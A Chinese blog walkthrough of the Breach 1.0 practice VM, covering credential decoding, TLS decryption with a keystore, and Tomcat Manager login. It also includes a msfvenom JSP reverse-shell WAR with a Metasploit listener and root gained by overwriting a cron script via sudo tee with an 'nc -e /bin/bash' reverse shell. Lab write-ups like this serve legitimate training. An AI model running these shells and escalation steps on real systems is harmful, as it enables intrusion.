• Breach 1.0 靶机


    Breach 1.0

    环境配置

    • 设置 VMware 上的仅主机模式网卡,勾选 DHCP 自动分配 IP,将子网改为 192.168.110.0/24

      image-20231020153422311

    • 将靶机和 kali 连接到仅主机网卡

    信息搜集

    存活检测

    image-20231020165835393

    详细扫描

    后台网页扫描

    image-20231020170040613

    网页信息搜集

    image-20231020170058373

    image-20231020170128236

    Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已委托其顶级顾问,由Bill Lumbergh、CISSP和Peter Gibbons、CjEH、SEC+、NET+、A+领导,对漏洞进行控制和分析。该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。
    
    • 1
    • 查看源码发现疑似密文,并且有一个 herf 链接,点击胖子图片进行跳转

      image-20231020170750540

      Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
      
      • 1
    • md5 解密

      cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
      
      • 1

      image-20231020173011317

      再次解密

      pgibbons:damnitfeel$goodtobeagang$ta
      
      • 1
    • 跳转的网页

      image-20231020170843459

    • 点击 employee portal 跳转到

      image-20231020173259352

    • 尝试使用刚刚解密出的值进行登录

      pgibbons
      damnitfeel$goodtobeagang$ta
      
      • 1
      • 2

      成功登录

      image-20231020173442067

    • 依次查询过滤有用信息

      最终在邮件中的第三封邮件中发现 “秘密证书” 字样

      并带有文件

      image-20231020174015307

    • 下载证书

      邮件上说把文件保存到这个网址

      尝试访问

      image-20231020174201646

    • 访问网页直接下载了 index.keystore 文件

      image-20231020174359224

    • 在 View Account 页面发现了一个流量包文件,下载

      并发现密码字样,密码为 tomcat

      image-20231020212823568

      image-20231020213435047

    流量信息搜集

    • 使用 wireshark 打开文件,发现有许多 TLS 加密的报文

      image-20231020213752184

    • .keystore 密钥/证书

      .keystore文件是一种用于存储密钥和证书的二进制文件格式。

      常见的TLS证书格式包括:

      1. DER格式:以.der或.crt扩展名保存的证书文件,通常包含单个X.509证书。
      2. PEM格式:以.pem或.crt扩展名保存的证书文件,它使用Base64编码,并使用"-----BEGIN CERTIFICATE-----“和”-----END CERTIFICATE-----"标记来界定证书内容。PEM格式可以包含单个或多个X.509证书。

      在Keystore中,使用Java的keytool工具可以将DER或PEM格式的证书导入到JKS或PKCS#12格式的Keystore中。

      解密:

      keytool -importkeystore -srckeystore index.keystore -destkeystore breach.p12 -deststoretype pkcs12 -srcalias tomcat
       
      -importkeystore 导出keystore
       
      -srckeystore  源keystore文件
       
      -destkeystore  导出之后的证书存放路径
       
      -deststoretype  导出keystore之后的证书类型
       
      -srcalias 源alias
      
      • 1
      • 2
      • 3
      • 4
      • 5
      • 6
      • 7
      • 8
      • 9
      • 10
      • 11

      成功生成证书文件

      image-20231020215004422

    • 将证书文件导入 wireshark

      image-20231020215728070

      image-20231020220256455

    • 查看数据包

      发现加密密文和一个网站,wireshark 已经将其解密了

      image-20231020221105881

    • 访问网站

      被浏览器的安全措施拦截

      image-20231020221439547

    • 使用 bp 代理,拦截,放包

      image-20231021130254880

    • 输入 wireshark 流量包解密的账号密码

      tomcat
      Tt\5D8F(#!*u=G)4m7zB
      
      • 1
      • 2

      image-20231021130324438

    • 成功登录进入Tomcat Manager 界面

      image-20231021130459816

    webshell

    • 生成 .war 木马文件

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=8888 -f war > shell.war
      
      • 1

      image-20231021131314929

    • 启动 msfconsole 并设置参数,开启监听

      mscconsole
      
      • 1
      use exploit/multi/handler
      
      • 1
      set LHOST 192.168.110.140
      set LPORT 8888
      run
      
      • 1
      • 2
      • 3

      image-20231021131858531

    • 上传木马文件

      image-20231021132037962

    • 打开上传的文件

      image-20231021132235570

    • 反弹成功

      image-20231021132357541

    提权

    信息搜集

    • 尝试 sudo -l 失败

      image-20231021132537316

    • 尝试 suid 提权失败

      image-20231021132941361

    • 搜集系统中有用信息

      最终在 /var/www/5446 目录下发现了 php 文件,其中显示了数据库的 user 为 root,并且密码为空

      image-20231021133253227

    数据库信息搜集

    • 在 mysql 数据库的 user 表中发现了数据库用户 milton 及加密的密码

      6450d89bd3aff1d893b85d3ad65d2ec2
      
      • 1

      image-20231021134539827

    • 解密密码

      thelaststraw
      
      • 1

      image-20231021134707886

    • 查看 /etc/passwd 文件也存在该用户

      尝试用其数据库密码进行登录

      image-20231021134847987

    • 成功登录

      image-20231021134939127

    • 尝试切换 blumbergh 用户

      image-20231021135854863

    • 提示需要密码

      image-20231021135953508

    • 查看用户密码文件

      image-20231021140108218

      发现了 Bill 字样

    • 在网页信息搜集时看到过 Bill 的图片

      下载图片,检测是否有隐写信息

      strings bill.png
      
      • 1

      image-20231021140809165

    • 测试登录密码

      coffeestains
      
      • 1

      image-20231021141030674

    • sudo -l 查看权限

      可以使用 tee 命令修改 tidup.sh

      image-20231021141116787

      tee 命令可将一个文件输出的内容输入到另一个文件

      读取 a.txt 中文本内容写入 file.txt

      cat a.txt | tee file.txt
      
      • 1
    • 查看 tidup.sh 权限

      image-20231021151358661

    • 查看文件

      image-20231021164920861

      说这个脚本每三分钟自动运行一次

    • 创建一个文件写入命令 bash

      image-20231021153535615

    • 写入

      cat shell | sudo  tee /usr/share/cleanup/tidyup.sh
      
      • 1

      image-20231021154045685

    • 失败,尝试使用 nc 反弹

      nc -e /bin/bash 192.168.110.129 7777
      
      • 1

      image-20231021165711137

    • 监听,等待连接

      image-20231021165809751

      成功 root

      image-20231021170223329

    总结

    • TLS 加密证书、.keystore 文件

    • 浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决

    • Tomcat Manager 上传 msf 生成的 .war 木马实现 webshell

    • tee

  • 相关阅读:
    基于单片机的红外遥控解码程序设计与实现
    基于SSM框架的杰森摄影工作室选片系统的设计和开发论文
    git-ssh-key协议同步文件
    Windows命令行窗口修改字体方法
    【JAVA】异常
    指针和数组关系-从例题的角度分析
    【毕业设计】基于javaEE+原生Servlet+MySql的企业员工信息管理系统设计与实现(毕业论文+程序源码)——企业员工信息管理系统
    SQLite数据库
    OA办公系统
    Git实战之git客户端上传文件到github
  • 原文地址:https://blog.csdn.net/weixin_51559599/article/details/133963794